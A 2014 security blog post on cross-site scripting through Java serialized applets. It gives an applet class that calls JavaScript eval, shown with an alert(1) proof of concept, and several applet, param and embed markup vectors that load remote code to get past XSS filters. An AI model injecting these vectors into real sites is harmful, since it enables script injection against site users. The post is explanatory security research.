Java Serialization

Tuesday, 6 May 2014

In this post I will explore Java serialized applets and how they can be used for XSS. A serialized applet contains code that can be easily stored and loaded. Java supports an attribute called “object” which accepts a url to a serialized class file this allows us to load applets of our choosing provided they can be serialized and implements the java.io.Serializable interface. This feature is very old and obscure and I have successfully used the technique to bypass filters that look for very specific XSS patterns.

In order to create a serializable Java applet you need the following code (You also need to add plugin.jar to the class path):

import java.applet.*;
import netscape.javascript.*;

public class XSS extends Applet implements java.io.Serializable {
public void init() {
JSObject win = (JSObject) JSObject.getWindow(this);
win.eval("alert(1);");
}
}

The plugin.jar has to be in your class path to compile as a serialized object with the JavaScript interpreter to call eval from inside the applet. When you have successfully compiled the serialized applet you can call it using the object attribute like so.

<applet object="xss.ser" codebase="http://any url here containing the class and serialized data"></applet>

Use code base to give the path to the serialized object and object to point to the filename. This isn’t the only method to include a serialized applet. The Java plugin in IE supports many ways to point to a serialized file. I can also use param elements to specify the object reference like the following:

<applet><param name=codebase value=http://someurl><param name=object value=xss.ser></applet>

Unbelievably the plugin supports a “java_” prefix in all attribute names. So the following is a valid request to a serialized file.

<applet java_codebase=http://someurl java_object=xss.ser></applet>

You can even use param elements to do the same thing. Like the following

<applet><param name=java_codebase value=http://someurl><param name=java_object value=xss.ser></applet>

Finally away from serialization there is another trick to embed a class file using the embed element.

<embed type=application/x-java-applet codebase=http://someurl code=xss.class MAYSCRIPT width=500 height=500></embed>

This also works with Flash and you don’t even need to specify the type attribute just the code attribute. This works on webkit.

<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

The entry 'Java Serialization' was posted on May 6th, 2014 at 7:39 pm and last modified on July 28th, 2014 at 8:06 pm, and is filed under java, Security, xss. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.

Comments are closed :( too much spam. If you want to contact me about any article please email or tweet me.

«
»